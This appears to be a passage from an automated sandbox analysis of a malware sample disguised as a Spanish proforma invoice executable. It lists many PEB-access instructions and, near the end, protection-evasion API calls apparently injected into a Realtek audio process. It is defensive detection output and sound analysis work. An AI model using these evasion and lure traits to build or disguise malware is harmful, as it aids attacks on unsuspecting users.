Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367C327E mov eax, dword ptr fs:[00000030h]		2_2_367C327E
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367C327E mov eax, dword ptr fs:[00000030h]		2_2_367C327E
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367C327E mov eax, dword ptr fs:[00000030h]		2_2_367C327E
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367ED270 mov eax, dword ptr fs:[00000030h]		2_2_367ED270
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AD250 mov eax, dword ptr fs:[00000030h]		2_2_367AD250
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AD250 mov ecx, dword ptr fs:[00000030h]		2_2_367AD250
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F124C mov eax, dword ptr fs:[00000030h]		2_2_367F124C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F124C mov eax, dword ptr fs:[00000030h]		2_2_367F124C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F124C mov eax, dword ptr fs:[00000030h]		2_2_367F124C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F124C mov eax, dword ptr fs:[00000030h]		2_2_367F124C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367EF247 mov eax, dword ptr fs:[00000030h]		2_2_367EF247
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3680B2BC mov eax, dword ptr fs:[00000030h]		2_2_3680B2BC
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3680B2BC mov eax, dword ptr fs:[00000030h]		2_2_3680B2BC
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3680B2BC mov eax, dword ptr fs:[00000030h]		2_2_3680B2BC
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3680B2BC mov eax, dword ptr fs:[00000030h]		2_2_3680B2BC
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675F24A mov eax, dword ptr fs:[00000030h]		2_2_3675F24A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36750230 mov ecx, dword ptr fs:[00000030h]		2_2_36750230
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_368032C9 mov eax, dword ptr fs:[00000030h]		2_2_368032C9
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B0227 mov eax, dword ptr fs:[00000030h]		2_2_367B0227
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B0227 mov eax, dword ptr fs:[00000030h]		2_2_367B0227
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B0227 mov eax, dword ptr fs:[00000030h]		2_2_367B0227
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676A22B mov eax, dword ptr fs:[00000030h]		2_2_3676A22B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676A22B mov eax, dword ptr fs:[00000030h]		2_2_3676A22B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676A22B mov eax, dword ptr fs:[00000030h]		2_2_3676A22B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672821B mov eax, dword ptr fs:[00000030h]		2_2_3672821B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367BB214 mov eax, dword ptr fs:[00000030h]		2_2_367BB214
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367BB214 mov eax, dword ptr fs:[00000030h]		2_2_367BB214
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672A200 mov eax, dword ptr fs:[00000030h]		2_2_3672A200
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]		2_2_367402F9
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]		2_2_367402F9
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]		2_2_367402F9
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]		2_2_367402F9
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]		2_2_367402F9
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]		2_2_367402F9
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]		2_2_367402F9
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]		2_2_367402F9
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367272E0 mov eax, dword ptr fs:[00000030h]		2_2_367272E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673A2E0 mov eax, dword ptr fs:[00000030h]		2_2_3673A2E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673A2E0 mov eax, dword ptr fs:[00000030h]		2_2_3673A2E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673A2E0 mov eax, dword ptr fs:[00000030h]		2_2_3673A2E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673A2E0 mov eax, dword ptr fs:[00000030h]		2_2_3673A2E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673A2E0 mov eax, dword ptr fs:[00000030h]		2_2_3673A2E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673A2E0 mov eax, dword ptr fs:[00000030h]		2_2_3673A2E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367382E0 mov eax, dword ptr fs:[00000030h]		2_2_367382E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367382E0 mov eax, dword ptr fs:[00000030h]		2_2_367382E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367382E0 mov eax, dword ptr fs:[00000030h]		2_2_367382E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367382E0 mov eax, dword ptr fs:[00000030h]		2_2_367382E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672D2EC mov eax, dword ptr fs:[00000030h]		2_2_3672D2EC
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672D2EC mov eax, dword ptr fs:[00000030h]		2_2_3672D2EC
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367532C5 mov eax, dword ptr fs:[00000030h]		2_2_367532C5
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672C2B0 mov ecx, dword ptr fs:[00000030h]		2_2_3672C2B0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367EF2AE mov eax, dword ptr fs:[00000030h]		2_2_367EF2AE
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F92AB mov eax, dword ptr fs:[00000030h]		2_2_367F92AB
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367542AF mov eax, dword ptr fs:[00000030h]		2_2_367542AF
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367542AF mov eax, dword ptr fs:[00000030h]		2_2_367542AF
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367292AF mov eax, dword ptr fs:[00000030h]		2_2_367292AF
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36737290 mov eax, dword ptr fs:[00000030h]		2_2_36737290
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36737290 mov eax, dword ptr fs:[00000030h]		2_2_36737290
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36737290 mov eax, dword ptr fs:[00000030h]		2_2_36737290
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE289 mov eax, dword ptr fs:[00000030h]		2_2_367AE289
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE372 mov eax, dword ptr fs:[00000030h]		2_2_367AE372
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE372 mov eax, dword ptr fs:[00000030h]		2_2_367AE372
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE372 mov eax, dword ptr fs:[00000030h]		2_2_367AE372
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE372 mov eax, dword ptr fs:[00000030h]		2_2_367AE372
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B0371 mov eax, dword ptr fs:[00000030h]		2_2_367B0371
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B0371 mov eax, dword ptr fs:[00000030h]		2_2_367B0371
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675237A mov eax, dword ptr fs:[00000030h]		2_2_3675237A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673B360 mov eax, dword ptr fs:[00000030h]		2_2_3673B360
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673B360 mov eax, dword ptr fs:[00000030h]		2_2_3673B360
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673B360 mov eax, dword ptr fs:[00000030h]		2_2_3673B360
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673B360 mov eax, dword ptr fs:[00000030h]		2_2_3673B360
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673B360 mov eax, dword ptr fs:[00000030h]		2_2_3673B360
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673B360 mov eax, dword ptr fs:[00000030h]		2_2_3673B360
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]		2_2_3676E363
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]		2_2_3676E363
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]		2_2_3676E363
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]		2_2_3676E363
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]		2_2_3676E363
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]		2_2_3676E363
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]		2_2_3676E363
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]		2_2_3676E363
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676A350 mov eax, dword ptr fs:[00000030h]		2_2_3676A350
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36728347 mov eax, dword ptr fs:[00000030h]		2_2_36728347
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36728347 mov eax, dword ptr fs:[00000030h]		2_2_36728347
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36728347 mov eax, dword ptr fs:[00000030h]		2_2_36728347
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36768322 mov eax, dword ptr fs:[00000030h]		2_2_36768322
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36768322 mov eax, dword ptr fs:[00000030h]		2_2_36768322
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36768322 mov eax, dword ptr fs:[00000030h]		2_2_36768322
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675332D mov eax, dword ptr fs:[00000030h]		2_2_3675332D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672E328 mov eax, dword ptr fs:[00000030h]		2_2_3672E328
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672E328 mov eax, dword ptr fs:[00000030h]		2_2_3672E328
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672E328 mov eax, dword ptr fs:[00000030h]		2_2_3672E328
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674E310 mov eax, dword ptr fs:[00000030h]		2_2_3674E310
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674E310 mov eax, dword ptr fs:[00000030h]		2_2_3674E310
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674E310 mov eax, dword ptr fs:[00000030h]		2_2_3674E310
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676631F mov eax, dword ptr fs:[00000030h]		2_2_3676631F
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36729303 mov eax, dword ptr fs:[00000030h]		2_2_36729303
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36729303 mov eax, dword ptr fs:[00000030h]		2_2_36729303
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367EF30A mov eax, dword ptr fs:[00000030h]		2_2_367EF30A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B330C mov eax, dword ptr fs:[00000030h]		2_2_367B330C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B330C mov eax, dword ptr fs:[00000030h]		2_2_367B330C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B330C mov eax, dword ptr fs:[00000030h]		2_2_367B330C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B330C mov eax, dword ptr fs:[00000030h]		2_2_367B330C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367633D0 mov eax, dword ptr fs:[00000030h]		2_2_367633D0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367643D0 mov ecx, dword ptr fs:[00000030h]		2_2_367643D0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B43D5 mov eax, dword ptr fs:[00000030h]		2_2_367B43D5
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672E3C0 mov eax, dword ptr fs:[00000030h]		2_2_3672E3C0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672E3C0 mov eax, dword ptr fs:[00000030h]		2_2_3672E3C0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672E3C0 mov eax, dword ptr fs:[00000030h]		2_2_3672E3C0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672C3C7 mov eax, dword ptr fs:[00000030h]		2_2_3672C3C7
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36803336 mov eax, dword ptr fs:[00000030h]		2_2_36803336
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367363CB mov eax, dword ptr fs:[00000030h]		2_2_367363CB
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AC3B0 mov eax, dword ptr fs:[00000030h]		2_2_367AC3B0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367393A6 mov eax, dword ptr fs:[00000030h]		2_2_367393A6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367393A6 mov eax, dword ptr fs:[00000030h]		2_2_367393A6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675A390 mov eax, dword ptr fs:[00000030h]		2_2_3675A390
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675A390 mov eax, dword ptr fs:[00000030h]		2_2_3675A390
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675A390 mov eax, dword ptr fs:[00000030h]		2_2_3675A390
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]		2_2_36731380
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]		2_2_36731380
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]		2_2_36731380
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]		2_2_36731380
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]		2_2_36731380
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]		2_2_3674F380
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]		2_2_3674F380
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]		2_2_3674F380
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]		2_2_3674F380
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]		2_2_3674F380
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]		2_2_3674F380
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367EF38A mov eax, dword ptr fs:[00000030h]		2_2_367EF38A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]		2_2_36804080
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]		2_2_36804080
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]		2_2_36804080
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]		2_2_36804080
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]		2_2_36804080
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]		2_2_36804080
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]		2_2_36804080
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36737072 mov eax, dword ptr fs:[00000030h]		2_2_36737072
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36736074 mov eax, dword ptr fs:[00000030h]		2_2_36736074
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36736074 mov eax, dword ptr fs:[00000030h]		2_2_36736074
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367D9060 mov eax, dword ptr fs:[00000030h]		2_2_367D9060
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36731051 mov eax, dword ptr fs:[00000030h]		2_2_36731051
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36731051 mov eax, dword ptr fs:[00000030h]		2_2_36731051
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36760044 mov eax, dword ptr fs:[00000030h]		2_2_36760044
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_368050B7 mov eax, dword ptr fs:[00000030h]		2_2_368050B7
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672D02D mov eax, dword ptr fs:[00000030h]		2_2_3672D02D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772010 mov ecx, dword ptr fs:[00000030h]		2_2_36772010
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36755004 mov eax, dword ptr fs:[00000030h]		2_2_36755004
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36755004 mov ecx, dword ptr fs:[00000030h]		2_2_36755004
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36738009 mov eax, dword ptr fs:[00000030h]		2_2_36738009
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672C0F6 mov eax, dword ptr fs:[00000030h]		2_2_3672C0F6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676D0F0 mov eax, dword ptr fs:[00000030h]		2_2_3676D0F0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676D0F0 mov ecx, dword ptr fs:[00000030h]		2_2_3676D0F0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367290F8 mov eax, dword ptr fs:[00000030h]		2_2_367290F8
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367290F8 mov eax, dword ptr fs:[00000030h]		2_2_367290F8
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367290F8 mov eax, dword ptr fs:[00000030h]		2_2_367290F8
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367290F8 mov eax, dword ptr fs:[00000030h]		2_2_367290F8
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674B0D0 mov eax, dword ptr fs:[00000030h]		2_2_3674B0D0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672B0D6 mov eax, dword ptr fs:[00000030h]		2_2_3672B0D6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672B0D6 mov eax, dword ptr fs:[00000030h]		2_2_3672B0D6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672B0D6 mov eax, dword ptr fs:[00000030h]		2_2_3672B0D6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672B0D6 mov eax, dword ptr fs:[00000030h]		2_2_3672B0D6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367EB0AF mov eax, dword ptr fs:[00000030h]		2_2_367EB0AF
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367700A5 mov eax, dword ptr fs:[00000030h]		2_2_367700A5
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367DF0A5 mov eax, dword ptr fs:[00000030h]		2_2_367DF0A5
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367DF0A5 mov eax, dword ptr fs:[00000030h]		2_2_367DF0A5
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367DF0A5 mov eax, dword ptr fs:[00000030h]		2_2_367DF0A5
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367DF0A5 mov eax, dword ptr fs:[00000030h]		2_2_367DF0A5

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtClose: Direct from: 0x7FF8BB0B9E7F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtQuerySystemInformation: Direct from: 0x6E95AD			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	NtSuspendThread: Indirect: 0x36443B29			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x6E24FA			Jump to behavior
